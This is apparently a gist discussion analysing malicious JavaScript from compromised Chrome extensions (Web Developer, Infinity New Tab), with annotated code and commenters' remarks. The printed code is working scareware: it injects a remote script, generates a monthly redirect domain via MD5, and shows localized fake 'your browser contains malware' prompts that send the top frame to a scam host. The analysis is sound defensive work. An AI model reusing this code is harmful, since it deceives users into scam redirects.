      getScript['parentNode']['insertBefore'](createScript, getScript);
      // note: this moves the page's original first script, not the injected one
      try {
        var getBody = document['body']['firstChild'];
        getBody['parentNode']['insertBefore'](getScript, getBody)
      } catch (e) {
        document['body']['appendChild'](getScript)
      }
    })()
  }
};

// Google Analytics (stock snippet; the sample above uses the https:// URL,
// this transcription a protocol-relative one). UA-103045553-1 is the
// attacker's tracking id — useful for correlating other samples.
(function(i, s, o, g, r, a, m) {
  i['GoogleAnalyticsObject'] = r;
  i[r] = i[r] || function() {
      (i[r].q = i[r].q || []).push(arguments)
    },
    i[r].l = 1 * new Date();
  a = s.createElement(o),
    m = s.getElementsByTagName(o)[0];
  a.async = 1;
  a.src = g;
  m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

// Always: load the scareware prompt 'Your computer is infected. You have to check it with antivirus.'
var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);

@kingzLoFitness

My system got caught in this Malware. Currently finding out that it was created in JavaScript. A redirect here for when I get better at knowing and reading code. I'm an informal student of JavaScript at the moment, about to get back into my studies of where I last left off.

@MiracleBlue

Looks like this is a variation of the same attack by the same malicious actor who I encountered when (s)he compromised the Infinity New Tab chrome extension in May. Same code for the domain name generating, same pasted md5 hashing fn (with Andy King reference), only major differences I can see in the one I encountered is the alert message in 8 different languages! There also seems to be a simple mechanism for throttling the frequency of alerts, so the user only sees it once per hour, rather than on every single page load or new tab.

There were some further write-ups, code samples, details and sleuthing from the Infinity New Tab case (and another on Betternet VPN extension in the comments) here: https://www.reddit.com/r/Malware/comments/6dm5m2/the_infinity_new_tab_chrome_extension_appears_to/

And here is the pasted code that was shipped with Infinity New Tab when it was compromised:

/* MD5 compression function (RFC 1321) — identical to the copy in the
 * Web Developer sample above: folds one 16-word block `k` into the
 * 4-word state `x` in place, four rounds of 16 steps, RFC shift amounts
 * and constants (signed-int32 form). Plain library code; the malicious
 * logic is the scareware/DGA script at the end of this paste. */
function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];

/* round 1 (F) */
a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17,  606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12,  1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7,  1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7,  1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22,  1236535329);

/* round 2 (G) */
a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14,  643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9,  38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5,  568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20,  1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14,  1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);

/* round 3 (H) */
a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16,  1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11,  1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4,  681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23,  76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16,  530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);

/* round 4 (I) */
a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10,  1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6,  1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6,  1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21,  1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15,  718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);

/* add the block's result to the chaining state (mod 2^32) */
x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);

}

/* One MD5 step: a = b + rotl32(a + q + x + t, s); `q` is the round
 * function's output, `x` the message word, `t` the round constant. */
function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}

/* Round 1 function F(b,c,d) = (b & c) | (~b & d) */
function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}

/* Round 2 function G(b,c,d) = (b & d) | (c & ~d) */
function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}

/* Round 3 function H(b,c,d) = b ^ c ^ d */
function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}

/* Round 4 function I(b,c,d) = c ^ (b | ~d) */
function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

/* Raw MD5 state (4 x int32) of string `s`, one UTF-16 code unit per
 * byte with no 8-bit masking — matches real MD5 only for inputs whose
 * code units are all <= 0xFF (fine for the "<month>/<year>" seed this
 * sample hashes). Same caveats as the copy above: `txt` is an implicit
 * global and only the low word of the bit length is written. */
function md51(s) {
txt = '';
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i; /* RFC 1321 IV */
/* full 64-char blocks */
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
/* tail: remaining chars, 0x80 terminator, zero fill */
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
/* no room for the length field in this block: flush, use a second one */
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
tail[14] = n*8; /* length in bits, low 32 bits only */
md5cycle(state, tail);
return state;
}

/* there needs to be support for Unicode here,
 * unless we pretend that we can redefine the MD-5
 * algorithm for multi-byte characters (perhaps
 * by adding every four 16-bit characters and
 * shortening the sum to 32 bits). Otherwise
 * I suggest performing MD-5 as if every character
 * was two bytes--e.g., 0040 0025 = @%--but then
 * how will an ordinary MD-5 sum be matched?
 * There is no way to standardize text to something
 * like UTF-8 before transformation; speed cost is
 * utterly prohibitive. The JavaScript standard
 * itself needs to look at this: it should start
 * providing access to strings as preformed UTF-8
 * 8-bit unsigned value arrays.
 */
/* Packs 64 UTF-16 code units of `s` into 16 little-endian 32-bit words,
 * with no masking — only code units <= 0xFF give a conforming MD5 block. */
function md5blk(s) {
var words = [];
for (var w = 0; w < 16; w++) {
var o = w * 4;
words[w] = s.charCodeAt(o)
+ (s.charCodeAt(o + 1) << 8)
+ (s.charCodeAt(o + 2) << 16)
+ (s.charCodeAt(o + 3) << 24);
}
return words;
}

/* Hex digit table used by rhex(). */
var hex_chr = '0123456789abcdef'.split('');

/* One 32-bit state word as 8 lowercase hex chars, least significant
 * byte first (MD5's little-endian digest order). */
function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}

/* 4-word state -> 32-char digest; overwrites the array elements in place. */
function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}

/* md5(s): lowercase hex digest of `s` (see md51 for the byte caveat). */
function md5(s) {
return hex(md51(s));
}

/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause.  */

/* 32-bit wrapping add; `| 0` is ToInt32, the same truncation the
 * original `& 0xFFFFFFFF` performs (0xFFFFFFFF is -1 as an int32). */
function add32(a, b) {
return (a + b) | 0;
}

/* Self-test against the known MD5 of "hello"; on failure (old IE, per the
 * author) add32 is redefined with a 16-bit-halves version. Only takes
 * effect under sloppy-mode (Annex B) block-function semantics; in a
 * strict script or ES module the inner declaration is block-scoped. */
if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}

/* Returns the decoded value of cookie `name` from document.cookie, or
 * undefined if absent. Regex metacharacters in `name` are escaped
 * before building the pattern. */
function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

console.log(top.location.href);

// Infinity New Tab variant: localised scareware prompt with a per-site
// cookie throttle and a monthly DGA for the redirect host.

// Suppress the prompt on pages whose URL contains "keeper", "tds", "mb"
// or "affid" — presumably the scam's own landing/affiliate pages. These
// are bare substring matches, so e.g. any URL containing "mb" (tumblr,
// thumbnail, ...) also suppresses it.
var is_keeper = top.location.href.indexOf("keeper") > -1 || top.location.href.indexOf("tds") > -1 || top.location.href.indexOf("mb") > -1 || top.location.href.indexOf("affid") > -1;

console.log(is_keeper);

var date = new Date;
var current_time = date.getTime();
// `_alert` holds the timestamp of the previous page load on this site.
// On a first visit getCookie() is undefined, so `pause` is NaN (falsy)
// and nothing is shown.
var cookie_time = getCookie('_alert');
var pause = current_time - cookie_time;

console.log('current_time: ' + current_time);
console.log('cookie_time: ' + cookie_time);
console.log('current_time - cookie_time: ' + (current_time - cookie_time));

    // Monthly DGA, LOCAL time, no padding: md5("<month>/<year>") (e.g.
    // "8/2017") + ".pro/tds.php?subid=ce". Differs from the Web Developer
    // sample (daily, UTC, "wd" prefix, .win TLD) but is just as
    // precomputable. `day` is computed but unused.
    var day = date.getDate();
    var month = date.getMonth() + 1;
    var year = date.getFullYear();
    var d = month + '/' + year;
    var tds_url = 'http://' + md5(d) + '.pro/tds.php?subid=ce';

console.log(tds_url);

    // The cookie is rewritten on EVERY page load (1-day expiry), so the
    // prompt fires only when the previous visit to this site was more
    // than an hour earlier — not "once per hour" while browsing it
    // continuously.
    date.setDate(date.getDate() + 1);
    document.cookie = "_alert=" + current_time + "; path=/; expires=" + date.toUTCString();

if (pause && pause > (60 * 60 * 1000) && !is_keeper) {

    // Message chosen by the first two letters of the browser language.
    var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
    if (lang) lang = lang.substring(0, 2);
    console.log('lang: ' + lang);

    var msg = 'Your computer is infected. You have to check it with antivirus.';

    if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
    if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
    if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
    if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
    if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
    if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
    // "gr" is not a language tag (Greek is "el"), so this branch never matches.
    if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";

    // OK navigates the top frame to the month's DGA host; declining does
    // nothing (a second redirect to browser-updates.info is commented out).
    if (confirm(msg)) {
        top.location.href = tds_url;
    } else {
//        window.top.location.href = 'https://browser-updates.info/s.html';
    }
}

@ofmarconi

Today with ChatGPT it's easier to solve all this, right?
